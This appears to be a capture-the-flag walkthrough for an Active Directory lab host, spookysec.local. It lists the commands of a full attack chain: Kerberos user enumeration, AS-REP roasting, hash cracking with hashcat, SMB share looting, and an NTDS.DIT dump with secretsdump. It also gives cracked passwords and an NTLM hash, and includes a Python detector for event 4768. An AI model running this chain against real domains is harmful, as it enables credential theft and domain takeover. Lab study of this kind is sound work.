nmapAutomator.sh 10.10.220.188 Basic

# using enum4linux for smb
perl /opt/enum4linux/enum4linux.pl 10.10.220.188

echo "10.10.220.188 spookysec.local" | sudo tee -a /etc/hosts

We use the user and password files we are given at:
https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/userlist.txt
https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/passwordlist.txt

# brute force for Kerberos users
./kerbrute_linux_amd64 userenum --dc spookysec.local -d spookysec.local /home/kali/Downloads/attacktive-directory-tools-master/userlist.txt -t 100

python3 /opt/impacket/GetNPUsers.py spookysec.local/svc-admin -request -no-pass -dc-ip 10.10.220.188
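
On the domain controller, the kerbrute user enumeration and the GetNPUsers.py request above both show up as Security event 4768 (Kerberos TGT request). The following Python is an added example, not part of the original notes: it flags both patterns in a list of reduced 4768 records. The records, source addresses, user names other than svc-admin, and the threshold are constructed assumptions.

```python
from collections import defaultdict

ENUM_THRESHOLD = 3  # assumption: distinct unknown principals from one source before alerting

def ev(user, ip, status, preauth, etype):
    """Build one reduced event 4768 (Kerberos TGT request) record."""
    return {"id": 4768, "user": user, "ip": ip, "status": status,
            "preauth": preauth, "etype": etype}

# Constructed sample; addresses and all user names except svc-admin are made up.
EVENTS = [
    ev("james", "10.9.0.5", "0x0", "2", "0x12"),         # normal logon: preauth, AES
    ev("jmaes", "10.9.0.5", "0x6", "-", "0xffffffff"),   # one typo, not a sweep
    ev("aaron", "10.9.0.77", "0x6", "-", "0xffffffff"),
    ev("bob", "10.9.0.77", "0x6", "-", "0xffffffff"),
    ev("carol", "10.9.0.77", "0x6", "-", "0xffffffff"),
    ev("dave", "10.9.0.77", "0x6", "-", "0xffffffff"),
    ev("svc-admin", "10.9.0.77", "0x0", "0", "0x17"),    # TGT issued without preauth, RC4
]

def find_user_enumeration(events, threshold=ENUM_THRESHOLD):
    """Sources requesting TGTs for many nonexistent principals
    (Status 0x6 = KDC_ERR_C_PRINCIPAL_UNKNOWN)."""
    unknown = defaultdict(set)
    for e in events:
        if e["id"] == 4768 and e["status"].lower() == "0x6":
            unknown[e["ip"]].add(e["user"].lower())
    return {ip: sorted(u) for ip, u in unknown.items() if len(u) >= threshold}

def find_no_preauth_tgt(events):
    """Successful TGTs with PreAuthType 0: the account does not require
    Kerberos preauthentication. The last tuple field marks RC4 (etype 0x17),
    the etype 23 AS-REP that hashcat mode 18200 targets."""
    hits = []
    for e in events:
        if e["id"] == 4768 and e["status"].lower() == "0x0" and e["preauth"] == "0":
            hits.append((e["user"], e["ip"], e["etype"], e["etype"].lower() == "0x17"))
    return hits

if __name__ == "__main__":
    print("enumeration sources:", find_user_enumeration(EVENTS))
    print("TGTs without preauth:", find_no_preauth_tgt(EVENTS))
```

Clearing "Do not require Kerberos preauthentication" on a flagged account removes the AS-REP exposure. A production rule would also bound the enumeration count by a time window.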

https://hashcat.net/wiki/doku.php?id=example_hashes

We save the hash in a file called hash.txt

hashcat --force -m 18200 -a 0 /home/kali/Desktop/boxes/hash.txt /usr/share/wordlists/rockyou.txt

crackmapexec smb 10.10.7.181 -u svc-admin -p management2005 --shares

crackmapexec smb 10.10.7.181 -u svc-admin -p management2005 --spider backup --pattern txt

smbclient -U spookysec.local/svc-admin //10.10.7.181/backup

cat backup_credentials.txt

echo "YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw" | base64 -d

To dump NTDS.DIT we run the following:

python3 /opt/impacket/examples/secretsdump.py -dc-ip 10.10.7.181 spookysec.local/backup:backup2517860@10.10.7.181

The NTLM hash is 0e0363213e37b94221497260b0bcb4fc

copyright©2022 Cu3rv0x all rights reserved